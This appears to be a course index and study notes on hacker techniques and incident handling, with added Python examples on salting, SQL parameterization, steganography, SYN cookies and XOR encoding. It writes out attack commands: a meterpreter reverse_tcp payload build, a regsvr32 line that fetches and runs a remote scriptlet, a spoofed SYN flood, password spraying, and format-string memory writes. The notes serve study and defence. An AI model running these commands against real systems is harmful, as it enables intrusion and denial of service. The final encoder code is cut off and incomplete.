use fgdump,cain,meterpreter hashdump,sniff,linux boot
Password Hashes 4 29 cd,ntbackup.exe
2 159 SMB Lab: Invoke-LocalPasswordSpray -Password Winter2017
password spraying
4 7 try a few passwds on many acc's on many sys. avoid acc lockout
password storing 4 5 in windows:SAM database and AD.In linux: etc/shadow
Payload to ./msfpayload win/meterpreter/reverse_tcp LHOST=[IP] X > /tmp/meterpreter.exe
executable(msfpayload)
PEBundle 5 19
PECompact 5 19
PeepNtom 2 98
People Preparation/assesment Sptoolkit and phishme: tools to create phishing campaigns for
1 20
tool assesment
1 23
Personally Identifiable
Information (PII) 4 111
5 159
phishme 1 20 tools to create phishing campaigns for employee assesment
phpBB 2 42
Picasa 2 31
Ping of Death 4 154
ping sweep determine hosts that are up in a IP range
Pivot 3 118 uses a compromised system as a launch point for other targets (eg.
Port Forwarding)
Pluggable Authentication 4 40-41
Modules (PAM)
Point of contact and POC and command comm center,secure comm.permisson for
1 35
Resources(prep) resources 5-10K
Rmt-ctl backdoor,configure server,move exe to target,control with
Poison Ivy 5 9, 14-15, 18 client.Binary,C,py
Policy - Peer Notification est policy for outside peer not,partners,you company,employees,vpn
1 26
(Preparation) with warning
aproach to incident handling,secret or notify law enf.contain&clear or
Policy (Preparation) 1 22 watch&learn
3 119
polymorphic changes it's code base in a way that it continues to execute,evades AV
4 56, 62-65
5 151, 194 XOR the code then preappend it with XOR decoder.2. X+Y=X-(-Y)
2 25, 27, 93
port 53 3 16
5 162
Port knocking backdoor technique,sniffer grabs packts to specific ports it's interested in.
Port Reporter - by Microsoft 2 102 free tool that generates logs showing port activity
Prep:Close unused ports and apply filters,stateful FW,IDS.Ide:IDS
Port Scanners-Defenses 2 100 sig,log analysis
port sentry tools 1 53 Host perimeter Detection
Portspoof Makes all ports on machine appear open with services enabled,confusing attker
portmapper 2 93
positive skew analysis 1 140
2 40
PowerPoint
3 133, 139, 141
PowerShell 1 140-141; 2 82, 142, 159-160; 3 142, 152, 161, 164-165, 168-169
PowerShell Empire 2 142
Preparation Overview 1 19 people, policy, data, software/hardware, communications, supplies, transport, space, power, documentation
reg query \\[MACHINE NAME] 1 126 command that even works remotely to check for changes to the registry
reg query 1 69, 85, 192
regedit 1 69, 85; 4 50
Registration attack register similar-looking domain names to fool users, e.g. vvindowsupdate.com
regsvr32 & scrobj.dll 3 150 regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll makes regsvr32 invoke the scriptlet on our behalf (scrobj.dll runs it, regsvr32 only loads the DLL); the /i: argument can take an external URL as the script location
Rekall 1 39, 110; 5 22-27, 29, 31-35 capture and analyze memory on Windows
rel 1 208, 212, 222, 229, 235, 239
Relay 1 167
Rootkit Backdoor Components (Linux) 5 44 login, rshd, sshd, inetd & TCP services are all modified; the attacker can give a password & get root
Rootkit Detection tools Linux 5 65 chkrootkit (link count, binary checks), Rootkit Hunter, OSSEC Rootcheck; check for inconsistencies
Rootkit Detection tools Windows 5 66 Sophos Anti-Rootkit, McAfee Rootkit Detective, RootkitRevealer, file integrity tools
Rootkit hiding 5 47 load the rootkit in a folder & run it with admin rights; all files, processes and network connections associated with it are hidden
Rootkit Hooking in Action 5 48 injects exp.dll into exp.exe, then hooks into iexp.dll for its code; all saved in system32
Rootkit Hunter 5 65
Rootkit Platform 5 42 Linux: Linux Rootkit 4, LRK5, LRK6; Solaris, BSD, AIX, HP-UX, IRIX, Windows
Round-Robin DNS 4 71 round-robin DNS records with a 3-10 minute TTL, populated with proxies; double flux
Return-Oriented Programming (ROP) 3 123 alter return pointers so the program executes existing library code from the legitimate OS instead of attacker-supplied code for the exploit. Used to bypass DEP (Data Execution Prevention, Windows)
rpcclient 2 137, 145, 150, 153-155, 157, 162 rpcclient -U [username] [IP] establishes an SMB session using Samba's rpcclient from Linux; then enumdomusers, enumalsgroups, lsaenumsid, lookupsids, srvinfo etc.
rpcclient - group membership 2 162 lookupnames administrators; queryaliasmem builtin 544 (default RID of the local Administrators group); lookupsids ...
rpcclient - groups and server info 2 154 enumalsgroups domain; enumalsgroups builtin; srvinfo
rpcclient -U test [IP] enumerate target information by logging in: srvinfo, queryuser, lookupnames test
Rubber Ducky 2 74; 3 5, 6 USB sticks that present themselves as auto-typing keyboards: download and run malware, steal data... (2 74: screenshot example; similar to Rubber Ducky)
runas 1 90 runas /user:Administrator cmd.exe
S-Tools embeds data in BMP files using LSB substitution; the result looks identical to the eye
S-Tools - Detection compare to the color table: more duplicate (near-identical) colors, different color histogram
S-Mail 5 148 hides data in .exe and DLL files
SAINT 2 119 vulnerability scanner (commercial)
salt 4 19-22, 28; 5 173 random value combined with the password before hashing, so identical passwords produce different hashes and precomputed (rainbow) tables do not apply
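The salt entry above is best seen side by side with an unsalted hash: two users with the same password, one storage format that can be verified later, and a check that the salt alone changes the stored value. This is an added example, not course code; the PBKDF2 parameters and the fixed salts used in the demo are assumptions.

```python
"""Salted password storage versus a bare hash (added example; iteration count
and the demo salts are constructed assumptions)."""
import hashlib
import hmac
import os
from typing import Optional

ITERATIONS = 100_000   # assumption: tune to your hardware budget


def unsalted_hash(password: str) -> str:
    """What a naive system stores: equal passwords give equal digests."""
    return hashlib.sha256(password.encode()).hexdigest()


def hash_password(password: str, salt: Optional[bytes] = None) -> str:
    """Return 'salt$iterations$digest' so the verifier can recover the parameters."""
    if salt is None:
        salt = os.urandom(16)          # per-user random salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return f"{salt.hex()}${ITERATIONS}${digest.hex()}"


def verify_password(password: str, stored: str) -> bool:
    salt_hex, iterations, digest_hex = stored.split("$")
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                 bytes.fromhex(salt_hex), int(iterations))
    # constant-time comparison so a verifier cannot be timed byte by byte
    return hmac.compare_digest(digest.hex(), digest_hex)


def same_password_two_users(password: str):
    """Show why a cracker cannot reuse one precomputed table across users."""
    return hash_password(password, salt=b"A" * 16), hash_password(password, salt=b"B" * 16)


if __name__ == "__main__":
    print("unsalted:", unsalted_hash("Winter2017"))
    for stored in same_password_two_users("Winter2017"):
        print("salted:  ", stored, verify_password("Winter2017", stored))
```

The digest stays deterministic for a given (salt, password) pair, which is exactly what verification relies on; the salt is not secret and is stored beside the hash, its job is only to make each user's hash a separate cracking problem.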
SAM database 3 18, 162; 4 5, 16, 20, 25, 28-29, 31
Samba 1 31; 2 70, 137, 144-145; 4 51
samba daemon (smbd) 2 137
Santy worm 2 42 searched Google for vulnerable versions of the phpBB script, then attacked the systems running it
Sasser 4 55, ,57-59
sc query 1 68, 83; 2 102 sc query lists services; sc stop [service] stops a Windows service
scanf 3 103
Scapy packet-crafting tool to build packets (Python)
Scareware 5 16 form of malware that uses social engineering to cause shock or fear
Scheduled Tasks 1 62, 73, 86-87, 253
schtasks 1 73, 87
SearchDiggity 2 43 runs searches across multiple networks to speed up finding information
SECEVENTS.EVTX 5 114
Setiri periodically, running on a victim machine, surfs to the connection broker using an invisible browser, through the personal/network firewall and an anonymizer, using HTTPS
secpol.msc 1 89; 5 45; 6 33
Search Directives 2 37 "link:", "site:", "intitle:", "related:", "info:"
Search engine recon - automated 2 43 Bishop Fox's Diggity, recon-ng (target compromised accounts), PunkSPIDER
SMB protocol 2 138 Layer 7 protocol that implements file and printer sharing, domain authentication, remote admin
Sniffing Backdoor Defenses Prep: keep attackers off the system. Ide: look for weird traffic, processes & sniffers. Con/Erad/Rec: backdoors; TLS 1.2, hard-coded (static) ARP entries, SSHv2, IPsec
Sniffing Backdoor Modes promiscuous; non-promiscuous
Sniffing Defenses Contain check other systems, remove the sniffer program, change passwords, take the interface out of promiscuous mode
Sniffing Defenses Identify ifconfig (PROMISC flag), warning in browser, EtherARP, strange DNS queries; arp -a / arp -e, look for ARP manipulation, arpwatch, ipconfig /displaydns
Sniffing Passive & Active 3 44-68
Sniffit captures network traffic with a GUI; allows the attacker to look at the data
SQL Parameterized stored procedure in the web app prepared SQL code that you can save, so the code can be reused over and over again; the statement structure (SELECT ... FROM ... WHERE ... AND ...) is fixed and user input is bound as parameters rather than concatenated into the SQL text
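The entry above is the defense; the contrast that makes it concrete is a login check built by string concatenation beside the same check with bound parameters, run against one in-memory table. This is an added example (not course code) using Python's sqlite3; the table, rows and injected strings are constructed.

```python
"""Concatenated SQL versus a parameterized query (added example; the users
table and its rows are constructed)."""
import sqlite3


def make_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (name TEXT, password TEXT, balance INTEGER)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?)",
                    [("admin", "S3cret!", 1000), ("bob", "bob123", 50)])
    return con


def login_vulnerable(con: sqlite3.Connection, name: str, password: str) -> bool:
    # the attacker's text becomes part of the statement: quote and comment characters are live
    sql = f"SELECT name FROM users WHERE name = '{name}' AND password = '{password}'"
    return con.execute(sql).fetchone() is not None


def login_safe(con: sqlite3.Connection, name: str, password: str) -> bool:
    # the statement is fixed; name and password travel as data, never as SQL
    sql = "SELECT name FROM users WHERE name = ? AND password = ?"
    return con.execute(sql, (name, password)).fetchone() is not None


def balance_safe(con: sqlite3.Connection, name: str):
    row = con.execute("SELECT balance FROM users WHERE name = ?", (name,)).fetchone()
    return None if row is None else row[0]


if __name__ == "__main__":
    con = make_db()
    for user, pw in [("admin", "S3cret!"), ("admin' --", "anything"), ("nobody", "' OR '1'='1")]:
        print(f"{user!r:16} {pw!r:16} vulnerable={login_vulnerable(con, user, pw)} "
              f"safe={login_safe(con, user, pw)}")
```

The two injected inputs work against the concatenated query for different reasons: `admin' --` closes the string and comments out the password check, while `' OR '1'='1` turns the whole WHERE clause true. Both are inert in `login_safe` because the driver never lets them reach the parser as SQL; a stored procedure that takes typed arguments gives the same guarantee server-side.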
SQL Slammer 1 96; 4 55
SQLInject.nse 4 104
sqlmap 4 104
sshd 1 256; 4 185-186, 188; 5 43, 50
SSHmitm 3 63
SSID cloaking 2 60-61
SSLStrip 2 68; 3 51, 67-68 strips the SSL from HTTPS: the victim's plain-HTTP traffic is made to look like HTTPS
startup items (Windows) 1 69, 70, 86 HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce & RunOnceEx; or wmic startup list full; or C:\>dir /s /b "C:\Documents and Settings\[userName]\Start Menu\"; or msconfig.exe
start C:\tmp\test.txt:nc.exe 5 110 run an executable stored in an Alternate Data Stream
Stash (Stego) 5 148 hides data in a variety of image formats
Statically-linked binary a self-contained program that needs no external libraries
Steganography 5 147-156 concealing data in images, Word documents, text, CGI, JPEG
Steganography - How it works requires a host file; the host can be generated; the hidden message either generates a file or hides in an existing file
Steganography - Generate new file the hidden message can generate a new file; used in CGIs, e.g. input text used to generate fractals
Steganography - Types injection, substitution (can lower the quality of the resulting file) and generating a new file
Steganography Defenses 5 155 Prep: learn stego tools, integrity-check web server files. Ide: compare with the original, hash
Steganography Defenses 2 5 156 Ide: with HR & legal; involves monitoring the victim & comparing to the original image. Con...: HR, legal
Steganography Defenses 3 use stegdetect
Steganography Example (Image - LSB) use substitution to change the least significant bit, with minimal impact on pixel color as seen by the human eye
Stegdetect 5 156 detects data hidden with Jsteg, JPHide, Invisible Secrets, OutGuess, F5, Appendix...
Stego Tools 5 148-149 Jsteg, MP3Stego, S-Mail (hides data in exe & DLL), Invisible Secrets (in ADS), Hydan: Windows, Linux
Stego vs Crypto Crypto: you know the data is being sent but cannot read it. Stego: you don't know data is being sent at all
StegExpose 5 154 Java utility that detects stego in lossless images hidden with LSB techniques
Strcpy 3 96, 103, 107
Stream Control Transmission Protocol (SCTP) 5 132 possible covert channel; multiplexed and multi-streaming, sends data via multiple connections, multihoming, has built-in C2 server failover
Streams 5 106 Microsoft Sysinternals tool for ADS; can list and delete streams
strncpy 3 96, 103, 107
Structured Query Language (SQL) 4 8, 26, 55, 103-111, 124, 128-130, 136-137, 141, 147, 150; 5 64, 168-172, 174
Stuxnet 3 65, 146; 4 55, 57-59, 64; 5 55
Subroutines 3 98 cause the CPU's instruction pointer to jump to a new location in memory to run code
Subterfuge 3 64 like dsniff but with a nice GUI; can also hijack sessions, strip SSL or downgrade HTTP, block VPN
Substitution (stego) data in the host is substituted with the hidden message; replaces insignificant data (e.g. least significant bits), which can lead to degradation of the host
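The substitution entries above (the LSB image example, S-Tools and its detection by duplicate colors) are one mechanism: overwrite the bit that matters least to the eye, then look for the statistical trace it leaves. The code below is an added example, not course material or S-Tools itself: it embeds and extracts a message in the LSBs of a byte buffer standing in for raw pixel samples, shows that no sample moves by more than 1, and implements the near-duplicate-color check on a constructed palette.

```python
"""LSB substitution stego plus the duplicate-color detection heuristic (added
example; the cover buffer, message and palettes are constructed)."""
from typing import Iterable, List, Sequence, Tuple


def _to_bits(data: bytes) -> Iterable[int]:
    for byte in data:
        for i in range(7, -1, -1):
            yield (byte >> i) & 1


def _from_bits(bits: Sequence[int]) -> bytes:
    return bytes(int("".join(str(b) for b in bits[i:i + 8]), 2)
                 for i in range(0, len(bits), 8))


def embed_lsb(cover: bytes, message: bytes) -> bytes:
    """Write a 32-bit length header plus the message into the LSB of each sample."""
    bits = list(_to_bits(len(message).to_bytes(4, "big") + message))
    if len(bits) > len(cover):
        raise ValueError("cover too small for message")
    out = bytearray(cover)
    for i, bit in enumerate(bits):
        out[i] = (out[i] & 0xFE) | bit      # clear the LSB, then set it to the message bit
    return bytes(out)


def extract_lsb(stego: bytes) -> bytes:
    bits = [b & 1 for b in stego]
    length = int.from_bytes(_from_bits(bits[:32]), "big")
    return _from_bits(bits[32:32 + 8 * length])


def max_sample_delta(cover: bytes, stego: bytes) -> int:
    """Largest per-sample change caused by embedding: 1 for pure LSB substitution."""
    return max(abs(a - b) for a, b in zip(cover, stego))


Color = Tuple[int, int, int]


def near_duplicate_colors(palette: List[Color]) -> int:
    """Count palette pairs whose channels differ by at most 1. Palette-based tools
    such as S-Tools need such pairs to hide bits in an indexed image, so an
    unusually high count is the 'more duplicate colors' signal in the entry above."""
    pairs = 0
    for i in range(len(palette)):
        for j in range(i + 1, len(palette)):
            if all(abs(a - b) <= 1 for a, b in zip(palette[i], palette[j])):
                pairs += 1
    return pairs


if __name__ == "__main__":
    cover = bytes(range(256)) * 4          # constructed stand-in for 1024 pixel samples
    stego = embed_lsb(cover, b"meet at dawn")
    print(extract_lsb(stego), "max delta:", max_sample_delta(cover, stego))
    print("suspicious pairs:", near_duplicate_colors([(128, 64, 32), (129, 64, 32), (128, 65, 33)]))
```

The embedding carries its own length so extraction stops at the message rather than reading noise; a real image tool does the same inside the container's pixel data and must skip headers. For the detection side, compare the pair count against the same image's original palette or against a corpus of clean images, since some photographs legitimately contain close colors.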
SubVirt 5 58 VM-based rootkit proof of concept
SucKIT 5 56, 65
sumfuq 5 50 originator of the kernel-mode rootkit
Supervisory Control And Data Acquisition (SCADA) 3 11; 4 58, 64
supporting tools (Linux) 1 258 chkrootkit = check for rootkit anomalies; Tripwire/AIDE integrity checker; fingerprint files
Suterusu 5 71-74
Set User ID (SUID) 1 249, 261; 3 106
SYN 1 54; 2 25, 90, 93-95; 3 36, 38; 4 154, 165, 167, 171, 175, 179-180, 185-186; 5 129-130 tcpdump notation: [S] - SYN; [S.] - SYN/ACK; [.] - ACK. Scan types; half-open connection. Firewalls can block incoming SYNs. Covert_TCP modes
SYN-ACK 2 25, 90, 93-94; 4 165, 185
SYN-flood 4 180 hping --syn --count 20 --spoof 10.10.11.11 -p 445 [target_machine]
SYN Flood - Defenses 4 Prep: Linux SYN cookies: ISNb = hash(secret number, src IP & port, dest IP & port) + ISNa + time counter, so the server keeps no half-open state until the final ACK proves the client is real
SYN Flood - Exhausting Resources send SYNs and never send the ACK; tie up all connection slots / use all bandwidth; use an unresponsive spoofed source IP so the SYN/ACKs go nowhere
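The SYN-cookie defense above is a protocol trick worth seeing as both sides of the exchange: the server's ISN in the SYN/ACK encodes a time counter, the client's MSS and a keyed hash over the 4-tuple and the client's ISN, and the final ACK is validated by recomputing that hash with no stored state. The code below is an added example in the shape of the Linux scheme, not the kernel's actual layout or code; the secret, the MSS table, the 64-second tick and the addresses are assumptions.

```python
"""SYN cookie construction and stateless validation (added example; the secret,
MSS table and 5-bit time counter are constructed, not the Linux kernel's)."""
import hashlib
import hmac

SECRET = b"constructed-server-secret"      # assumption: a rotated server secret
MSS_TABLE = (536, 1300, 1440, 1460)        # MSS values encodable in the 3 spare bits


def _cookie_hash(src: str, sport: int, dst: str, dport: int, tick: int, secret: bytes) -> int:
    msg = f"{src}:{sport}->{dst}:{dport}@{tick}".encode()
    return int.from_bytes(hmac.new(secret, msg, hashlib.sha256).digest()[:4], "big")


def make_syn_cookie(src: str, sport: int, dst: str, dport: int,
                    client_isn: int, mss: int, tick: int, secret: bytes = SECRET) -> int:
    """Server ISN for the SYN/ACK: 5 bits of time counter, 3 bits of MSS index,
    24 bits of keyed hash plus the client's ISN. Nothing is stored per connection."""
    mss_idx = max(i for i, m in enumerate(MSS_TABLE) if m <= mss)
    h = _cookie_hash(src, sport, dst, dport, tick, secret)
    return ((tick & 0x1F) << 27) | (mss_idx << 24) | ((h + client_isn) & 0xFFFFFF)


def check_syn_cookie(src: str, sport: int, dst: str, dport: int,
                     client_seq: int, ack_num: int, tick_now: int, secret: bytes = SECRET):
    """Validate the third-handshake ACK. Returns the MSS to use, or None if the
    ACK does not match a cookie issued in this or the previous tick."""
    cookie = (ack_num - 1) & 0xFFFFFFFF          # the ACK acknowledges ISNb + 1
    age = (tick_now - (cookie >> 27)) & 0x1F     # ticks since the cookie was minted
    if age > 1:
        return None                              # stale cookie or spoofed ACK
    tick = tick_now - age
    client_isn = (client_seq - 1) & 0xFFFFFFFF   # the client's seq in the ACK is ISNa + 1
    h = _cookie_hash(src, sport, dst, dport, tick, secret)
    if (cookie & 0xFFFFFF) != ((h + client_isn) & 0xFFFFFF):
        return None
    return MSS_TABLE[(cookie >> 24) & 0x7]


def handshake_demo():
    """Client 10.10.11.11 -> server 10.10.75.1:445 at tick 100 (constructed values)."""
    isn_a = 123456
    isn_b = make_syn_cookie("10.10.11.11", 40000, "10.10.75.1", 445, isn_a, 1460, tick=100)
    # legitimate ACK: seq = ISNa + 1, ack = ISNb + 1, arriving in the same tick
    return check_syn_cookie("10.10.11.11", 40000, "10.10.75.1", 445,
                            isn_a + 1, isn_b + 1, tick_now=100)


if __name__ == "__main__":
    print("negotiated MSS:", handshake_demo())
```

The flood in the previous entry never sends the ACK, so under cookies it costs the server one SYN/ACK and no memory. The price is visible in the code: options that do not fit in the ISN are lost (only an approximate MSS survives), and the 5-bit counter means a legitimate ACK delayed more than about two ticks is refused.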
SYS_execve 5 51, 53, 55
Sysinternals 1 69, 77, 126, 141; 2 137; 5 66, 106
SYSKEY 3 162; 4 31 provides an extra layer of 128-bit encryption for the SAM database as stored in the registry
tar / untar. Archives and compression 1 236; 5 94, 99 tar cvf, tar xvf, tar cvfz, tar xvfz. x - extract, v - verbose, f - from file; z - gunzip first, before opening the tar file. Lab: Shell History
Taranis 3 acts like macof: sends Ethernet frames that trick the switch into thinking one MAC is simultaneously on two ports
Task Manager (tasklist) 1 81-83, 126; 3 164-165, 167, 169, 173; 4 177-178; 5 27, 35
tasklist | find /I /c "notepad.exe" 4 178 count the number of processes named notepad.exe
tasklist can be run remotely 1 126 via PsExec from Microsoft Sysinternals. The Linux equivalent is ps
TCP 139 2 148 NetBIOS Session Service
TCP 22 4 185 SSH
TCP 445 2 89; 4 179 SMB; SMB is always listening on Windows
TCP 5500 5 12 VNC listening mode: the server connects out and sends the GUI to the client on 5500
TCP 5800 5 12 serves up a Java applet VNC viewer over HTTP
TCP 5900 5 12 VNC active mode: the server listens on TCP 5900 by default
TCP 6667 (IRC to control bots) 4 68 bots can be controlled with IRC; one-to-many communication
TCP 80 2 89 Web Server HTTP
TCP and UDP ports 2 89 65536 for TCP and the same for UDP; TCP tries to deliver messages reliably; UDP messages may be dropped
TCP control bits and 3-way handshake 2 90 SYN, ACK, FIN, RST, URG, PSH
Tcpdump 1 54, 266; 2 25, 106; 5 101, 141 -nn 'port 27917'; host 10.10.75.1 & -> log output. Attackers find connected systems by dumping DNS records; -i lo. ./tcpdump -n -s0 -w init.out port 80 & (-s0: snap length unlimited, i.e. capture the whole packet). tcpdump -i lo -s0 -A host 10.10.75.1 | grep VIEWSTATE (-A: include the ASCII from the dump)
TCP header 2 91 src port, dest port, sequence nr, ack nr, data offset, control bits, window
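The SYN, SYN-ACK, control-bit and TCP-header entries above all come down to reading one 16-bit word in the header and printing it the way tcpdump does ([S], [S.], [.], [P.]). The parser below is an added example, not course code: it packs and unpacks a 20-byte TCP header with the standard library, maps the flag bits to tcpdump's letters in tcpdump's own order, and labels each handshake step; the sample ports and sequence numbers are constructed.

```python
"""TCP header flag parsing with tcpdump-style output (added example; the
sample packets are constructed)."""
import struct
from typing import Dict

FIN, SYN, RST, PSH, ACK, URG = 0x01, 0x02, 0x04, 0x08, 0x10, 0x20
# the order tcpdump prints them: F S R P . U
_ORDER = ((FIN, "F"), (SYN, "S"), (RST, "R"), (PSH, "P"), (ACK, "."), (URG, "U"))
_HDR = "!HHIIHHHH"   # sport, dport, seq, ack, offset+flags, window, checksum, urgent ptr


def build_tcp_header(sport: int, dport: int, seq: int, ack: int, flags: int,
                     window: int = 65535) -> bytes:
    """20-byte header, no options (data offset 5 words); checksum left zero."""
    off_flags = (5 << 12) | (flags & 0x1FF)
    return struct.pack(_HDR, sport, dport, seq, ack, off_flags, window, 0, 0)


def parse_tcp_header(raw: bytes) -> Dict[str, int]:
    if len(raw) < 20:
        raise ValueError("truncated TCP header")
    sport, dport, seq, ack, off_flags, window, csum, urgp = struct.unpack(_HDR, raw[:20])
    return {"sport": sport, "dport": dport, "seq": seq, "ack": ack,
            "data_offset": (off_flags >> 12) * 4,   # header length in bytes
            "flags": off_flags & 0x1FF, "window": window}


def tcpdump_flags(flags: int) -> str:
    letters = "".join(ch for bit, ch in _ORDER if flags & bit)
    return f"[{letters or 'none'}]"


def handshake_step(flags: int) -> str:
    """Name the handshake role of a segment from its control bits."""
    if flags & SYN and not flags & ACK:
        return "SYN"
    if flags & SYN and flags & ACK:
        return "SYN/ACK"
    if flags & ACK and not flags & (SYN | FIN | RST):
        return "ACK"
    return "other"


def describe(raw: bytes) -> str:
    h = parse_tcp_header(raw)
    return (f"{h['sport']} > {h['dport']}: Flags {tcpdump_flags(h['flags'])}, "
            f"seq {h['seq']}, ack {h['ack']}, win {h['window']}  ({handshake_step(h['flags'])})")


if __name__ == "__main__":
    # constructed handshake to 445, then a data segment: client port 40000, server 445
    for raw in (build_tcp_header(40000, 445, 1000, 0, SYN),
                build_tcp_header(445, 40000, 5000, 1001, SYN | ACK),
                build_tcp_header(40000, 445, 1001, 5001, ACK),
                build_tcp_header(40000, 445, 1001, 5001, PSH | ACK)):
        print(describe(raw))
```

The half-open scan in the SYN entry is the first two lines of that exchange with the third never sent; a host whose firewall "blocks incoming SYNs" is dropping segments whose flags parse to [S] while still allowing [S.] and [.] for connections it initiated.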
TcpKill 3 53 sends spoofed resets to both sides to kill connections, forcing re-authentication; grab the authentication
TcpNice 3 53 sends packets to slow down the conversation so the attacker can sniff a fast connection
TCPView 1 77; 2 101 shows CURRENT traffic (TCP & UDP) in a GUI: all TCP and UDP endpoints on Windows systems; the non-GUI version is Tcpvcon
tcptraceroute and Layer Four Traceroute 2 124 send packets through a packet-filtering device to determine which ports are open
Team (preparation) 1 30 computer & physical security, operations, network management, legal, HR, DR etc.
Team Organization 1 32 define the IH team: on-site techies, command post. Establish a response-time baseline
Teardrop 4 154, 161 strangely fragmented (overlapping) packets that cause a DoS
Tenable 1 121; 2 119-120, 123
Ticketing tools 1 104 RTIR,CyberSPonse,Orion Live CD
Time Exceeded 2 83, 85
Tiny Fragment Attack the first fragment is tiny and carries only part of the offending header; the second fragment carries the rest, so a filter inspecting only the first fragment misses it
Topology 2 80, 84; 6 32, 48
Traceroute How it works traditionally 2 83 Linux: 1st packet with TTL=1; the router decrements it to 0 and sends TTL exceeded. 2nd packet TTL=2, and so on
Train the team 1 37 plan, set up tools, deploy honeypots, take forensic images in multiple ways, unannounced pen test
transform 2 46-47; 5 50, 148
Tripwire 1 193, 258; 5 7, 50, 67
Truly Nasty Payload - Worms 4 64 breeders consuming resources; steals info from systems; distributes bots
Truman analyze malware in an isolated environment
Virtual Machine escape breaking out of a VM and interacting with the host box
Virtual Network Computing (VNC) 5 9-14 free cross-platform remote access suite; most AV doesn't flag it because it is also a legitimate tool
VirtualAllocEx 5 45 allocates space in the victim process for DLL injection
VM detection IRs use VMs to test and defend against attacks. Malicious code can detect & destroy VMs: look for VME processes, memory artifacts, a shifted interrupt descriptor table, VME hardware, processor instructions
VM Escape allows an attacker in a guest to execute code on the host; Vmcat
Vmcat not a true escape, because it coordinates processes between host & guest
VM Escape Defenses patch; don't mix weak & strong systems or sensitive data with public; VMs are not firewalls
vmlinuz 5 57 stored kernel image, typically located in the /boot directory
VMware 3 77 MAC addresses beginning with 00:0c:29 are VMware
vmware machines (and associated files) 1 198 .vmx, nvram, .vmdk, .vmss, .vmsn
vmware network options 1 202 host-only, bridged and NAT
VMware networking watch-out 1 203 VMnet0 - bridged; VMnet1 - host-only; VMnet8 - NAT
vmware uses 1 197 IR, malware analysis, digital forensics, ethical and practice hacking
VNC Active and Listening client 5 12 active: server listens on TCP 5900; listening mode: server connects out and sends the GUI via TCP 5500 to the client
VNC modes (WinVNC) 5 13 app mode (in tray), service mode (in service list & tray after reboot), hide tray icon
war dialing and demon dialers 2 18, 29, 53-58 war dialers dial a series of numbers; demon dialers brute-force a single number for passwords. Prep: justify the business need, conduct it on the org, check phone bills, evening office modem check. Ide: PBX scanning, PBX IPS. Con: shut down the modem. Erad: remove the modem, change the number & password
War Driving 2 18, 60-75
war room 1 36 secure room with copies of evidence, locking cabinet, no windows
Warhol 4 60-61 pre-scan the Internet, load the worm with the hit list, infect the first vulnerable systems, spread
Web Application Attack Defenses 2 4 150 Prep: use a proxy to detect when inbound traffic is altered; ModSecurity, F5 ASM, Citrix
Web Application Attack Defenses 3 4 151 Ide: user complaints. Con: shut down the app & fix / quarantine victim accounts. Erad: remove data...
Web Application Attack and Audit Framework (w3af) 4 146 web app proxy, Python based; includes a MitM proxy for manipulating web apps (free)
Web Application Firewall (WAF) 4 101, 150
Web Application Manipulation proxy 4 use a proxy to manipulate data in transit: account numbers, balances, shopping cart prices etc.
Web Attack Proxy tools 4 Fiddler, ZAP proxy, Burp Proxy, w3af, Odysseus/Telemachus: all manipulation proxies
Web-based Recon/Attack Tools 2 50 Shodan, dnsstuff, traceroute.org, network-tools.com, securityspace.com
Wireless VPN crack 2 72 IKEcrack and Cain can break the PSK when the IPsec IKE exchange is set to aggressive mode
Wireshark - passive sniffer 1 43, 52; 3 46, 131, 134 captures packets and can process already-captured files; over 500 protocols
Witty 4 55, 57, 64
wmic 1 67, 70, 81-82, 126, 138, 188-189, 192; 2 102; 4 177-178; 5 26-27, 34-35, 110
wmic /node:[MachineName] /user:[user] /password:[pass] 1 126 look for unusual processes (works remotely)
wmic check USB and other plugged-in interfaces 1 192 wmic diskdrive get interfacetype,mediatype,model
wmic get users logged in 1 189 wmic computersystem get username
wmic get users logged in on all systems (remote cmd) 1 189 wmic /node:@systems.txt computersystem get username /format:csv
wmic on multiple systems, export to CSV wmic /node:@systems.txt product get description,name ... /format:csv > inv.txt
Worms - Flash Technique/Warhol 4 60 "hockey stick": pre-scan the Internet, load the worm with the hit list, infect the first vulnerable systems, spread
Worms - Fast Spreading 4 60 exponential; the spread curve has the shape of a hockey stick. Warhol: 99% in 15 minutes; Flash: 30 seconds
Worms - Metamorphic Worms 4 65 change appearance and function, e.g. a malware that does DoS, steals credit cards, user IDs
Worms - Multiplatform 4 58 may exploit multiple OS types; in 2010 Stuxnet: Windows & SCADA systems. Sadmind/IIS worm: Windows and Solaris
Worms - Polymorphic Worms 4 62 dynamically change appearance each time they run; keep the same function
Worms - Truly Nasty Payload 4 64 breeders consuming resources; steals info from systems; distributes bots
Worms intro and History 4 53-55 automated attack tools that spread via networks
Worm and Bot Defenses 4 74 Prep: buffer overflow defenses, test & deploy patches, encrypt the HDD. Ide: AV. Con: remove from the network
Wrappers 5 18 wrap a backdoor around some other app, aka binders; wrap exes into a backdoor. SaranWrap
Write Blocker 1 111 work with the forensic image copy in a read-only manner
Writing to memory locations little-endian (input the address bytes backwards); 2 hex digits = 1 byte; 0xbffffac0 = \xc0\xfa\xff\xbf, then %d%n to have printf write the count of characters printed so far to that address
wtmp (/var/log/wtmp) 5 89-90 contains records of past user logins
X-Ways Forensics 1 41 Forensics tool (Commercial)
XOR 3 97, 124, 144; 4 63 editing assembly: PUSH, POP, MOV. XOR of a register with itself = 0. XORing evil code with a key
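The polymorphic entry earlier (XOR the code, prepend a decoder) and the XOR entry above are the same mechanism seen from two sides: the body bytes change with every key while the decoded payload, and therefore the behaviour, stays fixed, which is why a byte signature on the original payload stops matching. The code below is an added example, not course code: the "decoder stub" is a constructed header, not real machine code, and the payload bytes and keys are constructed; it shows the encoding, the decode, and why a naive signature fails against the encoded form but still catches the decoded one.

```python
"""XOR-encoded polymorphic wrapper with a constructed decoder header (added
example; the stub format, keys and payload are constructed, not machine code)."""
import os
from typing import Optional

MAGIC = b"DEC"   # constructed marker for the decoder stub


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; its own inverse, which is what makes the stub tiny."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def make_polymorphic(payload: bytes, key: Optional[bytes] = None, key_len: int = 4) -> bytes:
    """Encode the payload with a fresh key and prepend a stub carrying the key.
    Each call with a different key yields a different byte pattern."""
    if key is None:
        key = os.urandom(key_len)
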